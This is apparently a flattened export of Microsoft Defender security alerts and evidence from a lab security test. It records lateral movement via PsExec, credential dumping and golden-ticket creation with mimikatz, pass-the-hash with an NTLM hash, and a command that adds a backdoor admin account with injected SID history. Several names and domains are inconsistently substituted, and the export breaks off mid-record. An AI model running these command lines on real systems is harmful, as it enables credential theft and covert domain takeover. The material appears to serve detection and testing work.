jeff@msdxv2.m365dpoc.com
4f4970c3545972fea2bc1984d597fc810e6321e0
25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369
net.exe
C:\Windows\System32
7,588
"net.exe" user /domain
2022-09-30T06:11:51.8945322Z
4,064
2022-09-30T06:11:13.210308Z
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
Detected
c7e147cb0eb3534a4dcea5acb8e61c933713b145
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-21T02:03:44.8266667Z
Suspicious
Active
jeff
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
6cbce4a295c163791b60fc23d285e6d84f28ee4c
de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
11,616
netstat -an
2022-11-21T02:01:44.3957302Z
null
null
null
null
Detected
c7e147cb0eb3534a4dcea5acb8e61c933713b145
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-21T02:11:52.3166667Z
Suspicious
None
steve
rnd.local
S-1-5-21-2300221942-1987151257-321556088-1107
0808dea1-2ec8-41d2-8e3e-7c18309fab09
steve@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
da638037515789312676_337396119
13dce730-70fb-459e-adaa-1ebeb77d16c6
686
MicrosoftDefenderForEndpoint
2022-11-11T08:19:38.9312907Z
2022-11-18T00:39:00.6933333Z
2022-11-12T01:35:42.84Z
2022-11-11T08:17:13.1854178Z
2022-11-11T08:17:34.7790325Z
File dropped and launched from remote location
A remote session dropped a file and executed it. An attacker or a malware might be an attempting move laterally or propagate.
LateralMovement
Resolved
Medium
36
TerminatedBySystem
TruePositive
SecurityTesting
WindowsDefenderAtp
17d50613-c135-4981-858e-86cdecb4e46e
takeshi@msdxv2.m365dpoc.com
null
null
[ "T1021.002", "T1105", "T1570" ]
[ { "aadDeviceId": "14b11ffe-5128-4842-bbdf-31f0fbfcb600", "defenderAvStatus": "Updated", "deviceDnsName": "msdxv2-win10b.msdxv2.m365dpoc.com", "firstSeen": "2022-08-08T08:29:47.252Z", "healthStatus": "Active", "loggedOnUsers": [], "mdatpDeviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "onboardingStatus": "Onboarded", "osBuild": 19043, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Semi Auto Client", "riskScore": "Medium", "tags": [ "semi auto" ], "version": "21H1", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10B", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "2f7d6bc4-df6d-4836-becd-aff9cb361b66" } } ]
[ { "aadUserId": null, "accountName": null, "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "Ip", "evidenceCreationTime": "2022-11-11T08:19:38.9833333Z", "fileName": null, "filePath": null, "ipAddress": "10.0.0.9", "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": "89b6fc86-af84-47b2-a72d-325362598b2c", "accountName": "ronhd", "detectionStatus": null, "deviceId": null, "domainName": "MSDXV2", "entityType": "User", "evidenceCreationTime": "2022-11-11T08:19:38.9833333Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "ronhd@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1111", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "User", "evidenceCreationTime": "2022-11-11T08:19:38.9833333Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": null, "userSid": "S-1-0-0", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-11T08:19:38.9833333Z", "fileName": "PSEXESVC.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db", "sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-18T05:10:33.5Z
Suspicious
None
jeff
test.domain
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-22T08:48:24.7866667Z
Suspicious
None
jeff
MSDXV8
S-1-5-21-2159906967-4174806019-1002223092-1104
null
jeff@msdxv8.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-13T22:34:04.4066667Z
Malicious
None
darol
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-18T05:10:39.1833333Z
Suspicious
None
analyst
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
da638045932869405772_-745641302
e8cc923b-7240-462d-967e-3c399c11cfc7
765
MicrosoftDefenderForEndpoint
2022-11-21T02:08:06.9406021Z
2022-11-26T01:35:43.17Z
2022-11-26T01:35:43.0633333Z
2022-11-21T02:06:56.8448435Z
2022-11-21T02:06:56.8448435Z
Malicious credential theft tool execution detected
A known credential theft tool execution command line was detected. Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more.
CredentialAccess
Resolved
High
null
UnsupportedAlertType
TruePositive
SecurityTesting
WindowsDefenderAtp
f5d3c5d8-ec3a-4412-ab45-934d8faff42c
takeshi@msdxv2.m365dpoc.com
null
null
[ "T1003" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "prod.env", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "None", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-21T02:08:06.97Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:08:06.97Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "\\Device\\HarddiskVolume4\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"mimikatz.exe\" privilege::debug \"kerberos::golden /domain:msdxv2.m365dpoc.com /sid:S-1-5-21-1296854425-3029985372-4181197820 /krbtgt:334c5cf2bab300e3e456e328f5c699d3 /user:Steve /ticket:C:\\M365DAttack\\Admin-Tickets\\ticket.kirbi /ptt\" exit", "processCreationTime": "2022-11-21T02:06:53.9715954Z", "processId": 6948, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-09-30T06:14:52.3Z
Suspicious
Active
jeff
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
4f4970c3545972fea2bc1984d597fc810e6321e0
25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369
net.exe
C:\Windows\System32
7,588
"net.exe" user /domain
2022-09-30T06:11:51.8945322Z
4,064
2022-09-30T06:11:13.210308Z
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
Detected
c7e147cb0eb3534a4dcea5acb8e61c933713b145
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-21T02:11:52.3166667Z
Suspicious
Active
SYSTEM
NT AUTHORITY
S-1-5-18
null
null
f309b61a8b005b5ce0a3fb58caaa798cfc95f5db
3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748
PSEXESVC.exe
C:\Windows
7,232
dir C:\
2022-11-21T02:07:15.1389846Z
680
2022-11-10T17:17:06.0160973Z
services.exe
C:\Windows\System32
Detected
e138ecd8e7b21eaf952cb35d56349bf50c64ac96
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-12-22T08:57:32.0566667Z
Suspicious
None
user1
NT AUTHORITY
S-1-5-18
null
null
f309b61a8b005b5ce0a3fb58caaa798cfc95f5db
3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748
PSEXESVC.exe
C:\Windows
4,216
PSEXESVC.exe
2022-12-22T08:47:50.8661147Z
748
2022-12-22T08:38:52.5569028Z
services.exe
C:\Windows\System32
Detected
4f111b3b2366eacdcc66d7ad73548fff9b039c15
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-21T02:04:34.8433333Z
Suspicious
None
ronhd
lab.net
S-1-5-21-2300221942-1987151257-321556088-1111
89b6fc86-af84-47b2-a72d-325362598b2c
ronhd@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
aa34310f27-bb21-4e63-a412-b971ff37f4f2
34310f27-bb21-4e63-a412-b971ff37f4f2
686
MicrosoftDefenderForIdentity
2022-11-11T08:24:15.3930109Z
2022-11-12T01:40:19.2533333Z
2022-11-12T01:35:42.84Z
2022-11-11T08:17:54.266549Z
2022-11-11T08:17:54.268357Z
Remote code execution attempt
An actor attempted to run commands remotely on MSDXV2-DC from MSDXV2-Win10V, using 1 service.
Execution
Resolved
Medium
null
UnsupportedAlertType
TruePositive
SecurityTesting
AzureATP
RemoteExecutionSecurityAlert
takeshi@msdxv2.m365dpoc.com
null
null
[ "T1047", "T1059", "T1053", "T1569", "T1059.001", "T1053.002", "T1053.005", "T1569.002" ]
[ { "aadDeviceId": null, "defenderAvStatus": "NotSupported", "deviceDnsName": "rnd.local", "firstSeen": "2022-08-08T08:27:58.906Z", "healthStatus": "Active", "loggedOnUsers": [], "mdatpDeviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "WindowsServer2019", "osProcessor": "x64", "rbacGroupName": "UnassignedGroup", "riskScore": "High", "tags": [], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-DC", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "5bc68ee9-2aaf-4b12-8045-60af8aecad6e" } }, { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "rnd.local", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "High", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-11T08:20:15.65Z
Suspicious
None
hacker
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-21T02:17:48.9433333Z
Suspicious
None
ronhd
malicious.io
S-1-5-21-2300221942-1987151257-321556088-1111
89b6fc86-af84-47b2-a72d-325362598b2c
ronhd@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-13T15:41:46.9633333Z
Suspicious
None
hacker
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-11T08:20:34.2166667Z
Suspicious
None
hacker
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
da638043451809630419_-665093391
beaf820c-2f6c-4b34-8b75-09f18ebaf689
741
MicrosoftDefenderForEndpoint
2022-11-18T05:13:00.9630666Z
2022-11-19T01:35:46.6533333Z
2022-11-19T01:35:46.5533333Z
2022-11-18T05:11:26.6986272Z
2022-11-18T05:16:26.1851657Z
Password hashes dumped from LSASS memory
LSASS process memory has been read to obtain password hashes, indicating possible credential theft. Attackers can use hashes obtained from LSASS process memory to impersonate or perform actions on behalf of logged on or recently logged on users.
CredentialAccess
Resolved
Medium
47
PartiallyInvestigated
TruePositive
SecurityTesting
WindowsDefenderAtp
2ed33edd-2c33-49fd-877b-ab73fba14d59
takeshi@msdxv2.m365dpoc.com
null
null
[ "T1003", "T1003.001" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "evilcorp.cn", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "High", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-18T05:13:01.0066667Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-18T05:13:01.0066667Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-18T05:13:01.0066667Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": "2022-11-18T05:04:12.7150402Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 4976, "processCommandLine": "\"mimikatz.exe\" privilege::debug sekurlsa::logonpasswords exit", "processCreationTime": "2022-11-18T05:09:25.5414924Z", "processId": 7696, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-11-18T05:13:01.0066667Z", "fileName": "lsass.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-10T07:06:09.0096674Z", "parentProcessFileName": "wininit.exe", "parentProcessFilePath": "\\Device\\HarddiskVolume4\\Windows\\System32", "parentProcessId": 532, "processCommandLine": "lsass.exe", "processCreationTime": "2022-11-10T07:06:09.0866649Z", "processId": 624, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "0fb26350106c9bdd196d4e7d01eb30007663687c", "sha256": "bbc83e4759d4b82bad31e371ad679aa414c72273bf97cee5aed8337ed8a4d79f", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-18T05:19:52.22Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": "2022-11-18T05:04:12.7150402Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "\\Device\\HarddiskVolume4\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 4976, "processCommandLine": "\"mimikatz.exe\" privilege::debug sekurlsa::logonpasswords exit", "processCreationTime": "2022-11-18T05:13:19.3011237Z", "processId": 9728, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-12-22T08:57:34.3066667Z
Suspicious
None
hacker
NT AUTHORITY
S-1-5-18
null
null
f309b61a8b005b5ce0a3fb58caaa798cfc95f5db
3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748
PSEXESVC.exe
C:\Windows
4,216
PSEXESVC.exe
2022-12-22T08:47:50.8661147Z
748
2022-12-22T08:38:52.5569028Z
services.exe
C:\Windows\System32
Detected
4f111b3b2366eacdcc66d7ad73548fff9b039c15
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-18T04:50:03.6566667Z
Suspicious
None
analyst
TMTOWER-BOOK
S-1-5-21-7316772-2057538409-3008203053-1001
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-18T05:10:33.7633333Z
Suspicious
None
svc_acct
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
70df765f554ed7392200422c18776b8992c09231
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
mimikatz.exe
C:\M365DAttack\Mimikatz\x64
6,500
"mimikatz.exe" privilege::debug "sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\"powershell.exe C:\M365DAttack\Get-KRBTicket.ps1\"" exit -Wait
2022-11-18T05:09:31.2191789Z
4,976
2022-11-18T05:04:12.7150402Z
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
Detected
c7e147cb0eb3534a4dcea5acb8e61c933713b145
da638045935113744267_1561680225
02e6af6b-d1cc-4482-939d-e15e8a5f6e16
765
MicrosoftDefenderForEndpoint
2022-11-21T02:11:51.3744432Z
2022-11-26T01:35:43.17Z
2022-11-26T01:35:43.0633333Z
2022-11-21T02:07:15.8948675Z
2022-11-21T02:34:15.7485618Z
Suspicious account creation
A new user account was created. A new user account can be created to establish a secondary of backup access to the device or services within the organization. An attacker might be attempting to maintain access to the device or organization.
Persistence
Resolved
Medium
null
UnsupportedAlertType
TruePositive
SecurityTesting
WindowsDefenderAtp
b0c31f72-1d80-458a-8ceb-5bc7bbcbd30a
takeshi@msdxv2.m365dpoc.com
null
null
[ "T1136", "T1136.001" ]
[ { "aadDeviceId": null, "defenderAvStatus": "NotSupported", "deviceDnsName": "malicious.io", "firstSeen": "2022-08-08T08:27:58.906Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "Defender", "domainName": "MSDXV2" } ], "mdatpDeviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "WindowsServer2019", "osProcessor": "x64", "rbacGroupName": "UnassignedGroup", "riskScore": "None", "tags": [], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-DC", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "5bc68ee9-2aaf-4b12-8045-60af8aecad6e" } } ]
[ { "aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09", "accountName": "steve", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-21T02:11:51.46Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "steve@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1107", "verdict": "Suspicious" }, { "aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09", "accountName": "steve", "detectionStatus": "Detected", "deviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:11:51.46Z", "fileName": "cmd.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:07:15.1389846Z", "parentProcessFileName": "PSEXESVC.exe", "parentProcessFilePath": "C:\\Windows", "parentProcessId": 7232, "processCommandLine": "\"cmd\" /c \"net.exe user /add BDAdmin Password1! && net.exe stop ntds /y && powershell.exe -Command \"Add-ADDBSidHistory -SamAccountName BDAdmin -SidHistory \\\"S-1-5-32-544\\\" -DatabasePath (Get-ItemProperty -Path Registry::HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters).\\\"DSA Database file\\\"\" && net.exe start ntds\"", "processCreationTime": "2022-11-21T02:07:15.6313121Z", "processId": 3020, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "ded8fd7f36417f66eb6ada10e0c0d7c0022986e9", "sha256": "bc866cfcdda37e24dc2634dc282c7a0e6f55209da17a8fa105b07414c0e7c527", "url": null, "userPrincipalName": "steve@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1107", "verdict": "Suspicious" }, { "aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09", "accountName": "steve", "detectionStatus": "Detected", "deviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": 